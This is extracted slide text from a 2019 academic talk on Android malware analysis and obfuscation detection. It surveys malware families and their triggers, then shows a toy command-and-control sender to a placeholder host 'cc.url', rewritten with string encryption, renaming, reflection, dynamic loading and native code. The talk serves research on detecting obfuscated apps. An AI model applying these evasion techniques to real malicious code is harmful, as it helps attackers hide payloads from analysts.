Obfuscated Android Application Developmentpeople.rennes.inria.fr/Jean-Francois.Lalande/talks/CECC19-lalande.pdf · Obfuscated Android Application Development Jean-François Lalande

Introduction Malware examples Malware analysis Obfuscation Results

Obfuscated Android Application Development

Jean-François LalandePierre Graux Valérie Viet Triem Tong

CECC 2019

November 14th 2019

2 / 37


Introduction

3 / 37


Android malware analysis

Android malware analysisstatic analysis: (byte)code parsing +CFG analysisdynamic analysis: execution(smartphone, cuckoo sandbox)

Research goals:

malware detection, classificationflow recovering, data taintingpayload triggering, unpacking

By Con-struct + replicant

community [CC BY-SA 3.0]

3 / 37


Android malware analysis

Android malware analysisstatic analysis: (byte)code parsing +CFG analysisdynamic analysis: execution(smartphone, cuckoo sandbox)

Research goals:

malware detection, classificationflow recovering, data taintingpayload triggering, unpacking

By Con-struct + replicant

community [CC BY-SA 3.0]

4 / 37


Research papers

Research papers usually do:1 Algorithm design e.g. malware detection2 Pick or build a dataset3 Evaluation: pick a sample and run!

Building a dataset is difficult!

Where to find these sample? Are they representative?. . .

Evaluating is difficult!

You may suffer crashes, operating system corruption. . .

What about “difficult” malware?Do we have them in the dataset?Triggering conditions?Obfuscated?

4 / 37


Research papers







4 / 37


Research papers







4 / 37


Research papers







5 / 37


Malware examples

6 / 37


Example: Remote Admin Tools

Install malicious apps:

Badnews: Obeys to a remote server + delays attackTriggering: Patch the bytecode + Build a fake server

DroidKungFu1 (well known): Delays attackTriggering: Modify ’start’ to 1 in sstimestamp.xml andreboot the device

7 / 37


Example: Blocker / Eraser

Wipes of the SD card and block social apps:

WipeLocker: Delayed AttackTriggering: Launch the app and reboot the device

8 / 37


Example: Adware

Displays adds after some days:MobiDash: Delayed AttackTriggering: Launch the application, reboot the device andmodify com.cardgame.durak_preferences.xml

9 / 37


Example: Spyware

Steals contacts, sms, IMEI, . . .SaveMe: Verifies the Internet accessTriggering: Enable Internet access and lauch the app

Cajino: Obeys a Baidu remote serverTriggering: Simulate a server command with an Intent

10 / 37


Ransomware

Encrypts user’s files and asks for paying:

SimpleLockerWaits the reboot of the deviceTriggering: send a BOOT_COMPLETED intent

11 / 37


Malware analysis

12 / 37


Our analysis framework: GroddDroid1

APK

StaticAnalysis

CFG

Payload Location

API usage, etc.

Control Flow Tracer

TargetingOne Payload

Real smartphone

GroddDroidRunner

ReferenceExecution

LogCollector

controls

NewAPK

Malicious CodeTrigering Coverage

CodeCoverage

Execution withBranch Forcing

controls

GroddDroid ForcesControl Flow

New APK

1Abraham et al. 2015, Leslous et al. 2017

12 / 37



APK

StaticAnalysis

CFG

Payload Location

API usage, etc.

Control Flow Tracer


Real smartphone

GroddDroidRunner

ReferenceExecution

LogCollector

controls

NewAPK


CodeCoverage


controls


New APK


12 / 37



APK

StaticAnalysis

CFG

Payload Location

API usage, etc.

Control Flow Tracer


Real smartphone

GroddDroidRunner

ReferenceExecution

LogCollector

controls

NewAPK


CodeCoverage


controls


New APK


12 / 37



APK

StaticAnalysis

CFG

Payload Location

API usage, etc.

Control Flow Tracer


Real smartphone

GroddDroidRunner

ReferenceExecution

LogCollector

controls

NewAPK


CodeCoverage


controls


New APK


12 / 37



APK

StaticAnalysis

CFG

Payload Location

API usage, etc.

Control Flow Tracer


Real smartphone

GroddDroidRunner

ReferenceExecution

LogCollector

controls

NewAPK


CodeCoverage


controls


New APK


13 / 37


GroddDroid output example: simplelocker

14 / 37


Triggering conditions?

1 installed = getPackageManager()2 .getPackageInfo("jf.andro.malcon15demo2",0)3 .firstInstallTime;4 SimpleDateFormat sdf = new SimpleDateFormat("yyyy");5 int yearInstalled = Integer.parseInt(sdf.format(installed));

7 // We trigger the malicious code next year !8 if (currentYear > yearInstalled)9 {

10 // payload11 }

Listing 1: Example of triggering condition

15 / 37



APK

StaticAnalysis

CFG

Payload Location

API usage, etc.

Control Flow Tracer


Real smartphone

GroddDroidRunner

ReferenceExecution

LogCollector

controls

NewAPK


CodeCoverage


controls


New APK


15 / 37



APK

StaticAnalysis

CFG

Payload Location

API usage, etc.

Control Flow Tracer


Real smartphone

GroddDroidRunner

ReferenceExecution

LogCollector

controls

NewAPK


CodeCoverage


controls


New APK


16 / 37


So, all problems are solved?

DatasetsYou don’t really know what you have in datasets.

Dynamic analysisYou have to help malware to execute themselves.

Static analysisObfuscation can prevent you to:

Analyze or build your datasetDrive your dynamic analysis

⇒ we have the feeling that obfuscation use is increasing. . .

16 / 37








16 / 37








17 / 37


Obfuscation

18 / 37


Studying obfuscation

Objectives:

Explain how to build obfuscated applicationsPropose detection algorithmsMeasure obfuscation usage in the wild

Contributions:

Explain how to build obfuscated applicationsDetection algorithms are difficult to designWe can only measure programming usage techniques

18 / 37


Studying obfuscation

Objectives:

Explain how to build obfuscated applicationsPropose detection algorithmsMeasure obfuscation usage in the wild

Contributions:

Explain how to build obfuscated applicationsDetection algorithms are difficult to designWe can only measure programming usage techniques

19 / 37


Running example: connecting to a CC server

1 class CommandAndControl {2 public String url = "cc.url";3 public int port = 4242;4 public void sendCommand(byte[] buf, int length) {5 DatagramPacket dp = new DatagramPacket(buf, length,6 InetAddress.getByName(this.url),7 this.port);8 new DatagramSocket().send(dp));9 }

10 }

Listing 2: Unobfuscated malicious code

20 / 37


String encryption

1 class AES256 {2 static public String aes256(String str) {3 String key = "<<key>>"... }4 }5 class CommandAndControl {6 public String url = "<<ciphered url>>"; // "cc.url"7 public int port = 4242;8 public void sendCommand(byte[] buf, int length) {9 DatagramPacket dp = new DatagramPacket(buf, length,

10 InetAddress.getByName(AES256.aes256(this.url)),11 this.port);12 new DatagramSocket().send(dp);13 }14 }

Listing 3: String encrypted version

21 / 37


Running example: identifier renaming

1 class ____ {2 public String ____ = "cc.url";3 public int ___ = 4242;4 public void ________(byte[] __, int _____) {5 DatagramPacket _______ = new DatagramPacket(__,6 _____,7 InetAddress.getByName(this.____),8 this.___);9 new DatagramSocket().send(_______);

10 }}

Listing 4: Identifier renaming version

22 / 37


Running example: reflection

1 class CommandAndControl {2 public String url = "cc.url";3 public int port = 4242;4 public void sendCommand(byte[] buf, int length) {5 InetAddress addr = InetAddress.class6 .getDeclaredMethod("get"+"ByName", String.class)7 .invoke(null, this.url);8 DatagramPacket dp = new DatagramPacket(buf, length,9 addr, this.port);

10 DatagramSocket.class.getDeclaredMethod("s"+"end",11 DatagramPacket.class)12 .invoke(new DatagramSocket(), dp);13 }}

Listing 5: Reflection version

23 / 37


Running example: dynamic code loading

1 void invokeDynamically() {2 /* Loads the implementation of C&C */3 PathClassLoader pcl =4 new PathClassLoader(file.getPath(), null);5 Class<?> clazz =6 pcl.loadClass("CommandAndControl", this);7 Log.i("CL", "Loaded class from dex: " + clazz);8 Constructor<?> c = clazz.getConstructor();9 Object o = c.newInstance();

10 Method m = clazz.getMethod("send",11 byte[].class, int.class);12 m.invoke(o, ...); // CommandAndControl.send(....)13 }

Listing 6: Dynamic code loading version

24 / 37


Running example: native methods

1 class CommandAndControl {2 public String url = "cc.url";3 public int port = 4242;4 native public sendCommand(byte[] buf, int length);5 }6 JNICALL Java_CommandAndControl_sendCommand(JNIEnv*env,7 jobject thisPtr, jbyteArray buf, jint length) {

9 byte * bufData = env->GetByteArrayElements(buf, NULL);10 jint port = env->GetIntField(thisPtr,11 env->GetFieldId(env->GetObjectClass(thisPtr),12 "port", "I"));

14 /* Use libc functions to send the packet */15 }

Listing 7: Native version

25 / 37


Running example: packer

Unpacker:

Unpack routine: unpack the bytecode of the applicationLoad and run this new bytecode

26 / 37


Detecting obfuscation?

Is obfuscation used in the wild?Can we design a detection technique for obfuscated app ?

APK APK’obfuscation

Goal:

classify APK as non obfuscatedclassify APK’ as obfuscated

27 / 37


Detection techniques

Detecting techniques for obfuscation purpose ?

Table: Overview of our analysis methods

Development technique Analysis method DetectionString encryption usage ratio yes (threshold)

Identifier renaming usage ratio yes (threshold)Reflection use no

Dynamic code loading use noNative method use no

Packer artifacts yes

27 / 37






Identifier renaming usage ratio yes (threshold)

Reflection use noDynamic code loading use no

Native method use noPacker artifacts yes

27 / 37









27 / 37







Dynamic code loading use no

Native method use noPacker artifacts yes

27 / 37









27 / 37









27 / 37









28 / 37


Strings encryption

APK Constant Strings Entropy e

n strings st. e > T

extract compute

Decision Threshold: choose n=1, 10, 100;

29 / 37


Identifier renaming

APKNB Identifierssize filtering

Matching

n matchesRatio j = nNB

Worddictionary

extract

Examples:

1 private Integer my_variable; // Original2 private String zwf_fwz; // Renamed3 private String u; // Too short: cannot conclude

30 / 37


Other techniques

Reflection java.lang.reflect

Dynamic code loading DexFile, PathClassLoaderNative methods: private native void f()

Packers: artifact detection with Apkid

31 / 37


Results

32 / 37


Datasets

AMD Dataset (Wei et al. [4]): 24,552 samples 10-16Drebin (Arp et al. [2]): 5,560 samples 08-12GoodMal19 (Viet Triem Tong et al. [3]): 10,000 samples15-18Androzoo (Allix et al. [1]): 9,041 samples 08-18

33 / 37


Obfuscation detection

Total Packer Native DCL Reflection

GOOD [3] 4999 3 1266 4544 47350,06% 25,58% 91,82% 95,68%

MAL [3] 4991 542 2378 3730 389310,86% 57,62% 90,38% 94,33%

AMD [4] 24552 31 5206 15267 191840,13% 21,52% 63,12% 79,31%

Drebin [2] 5560 0 1051 1449 30660% 19,07% 26,29% 55,62%

34 / 37


Identifier renaming

0.3 0.4 0.5 0.6 0.7 0.8 0.9 1.0Ratio threshold

20

0

20

40

60

80

100

120

13

Dete

ctio

n ra

te

GOODMALAMDDrebin

35 / 37


Entropy for GOOD Dataset

0.0 1.0 2.0 3.0 4.0 5.04.4 4.6Entropy threshold

0

20

40

60

80

100

11

Dete

ctio

n ra

tio

n = 1n = 10n = 100

36 / 37


Conclusion and future works

Obfuscationusage increasedifficult to distinguish from legitimate use

Future works:Analysis of native applicationsDataset building and usePyMaO: an open source software for orchestratingexperiments

c©Inria / C. Morel

Questions ?

1 / 2

References I

[1] Kevin Allix, Tegawendé F. Bissyandé, Jacques Klein, andYves Le Traon.Androzoo: Collecting millions of android apps for theresearch community.In 13th International Conference on Mining SoftwareRepositories, MSR ’16, pages 468–471, New York, NY,USA, 2016. ACM.

[2] Daniel Arp, Michael Spreitzenbarth, Malte Hubner, HugoGascon, Konrad Rieck, and CERT Siemens.Drebin: Effective and explainable detection of androidmalware in your pocket.In 21st Annual Network and Distributed System SecuritySymposium, volume 14, pages 23–26, San Diego, CA,USA, 2014.

2 / 2

References II

[3] V. Viet Triem Tong, C. Herzog, T. Concepción Miranda,P. Graux, J.-F. Lalande, and P. Wilke.Isolating malicious code in android malware in the wild.In 14th International Conference on Malicious andUnwanted Software, Nantucket, MA, USA, 2019. IEEEComputer Society.

[4] Fengguo Wei, Yuping Li, Sankardas Roy, Xinming Ou, andWu Zhou.Deep ground truth analysis of current android malware.In International Conference on Detection of Intrusions andMalware, and Vulnerability Assessment, pages 252–276.Springer, 2017.

Documents

Obfuscated Android Application Developmentpeople.rennes.inria.fr/Jean-Francois.Lalande/talks/CECC19-lalande.pdf · Obfuscated Android Application Development Jean-François Lalande